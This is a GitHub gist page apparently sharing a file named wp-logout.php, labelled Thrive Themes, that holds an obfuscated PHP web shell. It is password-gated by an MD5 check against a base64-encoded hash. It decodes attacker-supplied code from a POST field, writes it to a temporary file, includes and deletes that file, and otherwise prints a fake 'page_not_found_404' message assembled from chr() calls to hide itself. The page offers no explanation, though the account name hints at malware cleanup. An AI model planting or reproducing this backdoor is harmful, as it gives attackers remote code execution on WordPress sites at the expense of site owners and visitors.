-
-
Save magefix/5d8d2cf0c98bbcfb7d3e6469fe336c21 to your computer and use it in GitHub Desktop.
wp-logout.php ( Thrive Themes )
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php if(isset($_POST['zi']) && md5($_POST['zi']) == base64_decode("M2UwZWFhNWFlNGE1NzRjMGYzYjEyOTRmZGQwZTg1ZTQ=") ) {$lt = base64_decode($_POST['a']);file_put_contents('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}}else{if(isset($_GET['cl'])){echo chr(112).chr(97).chr(103).chr(101).chr(95).chr(110).chr(111).chr(116).chr(95).chr(102).chr(111).chr(117).chr(110).chr(100).chr(95).chr(52).chr(48).chr(52);}} ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment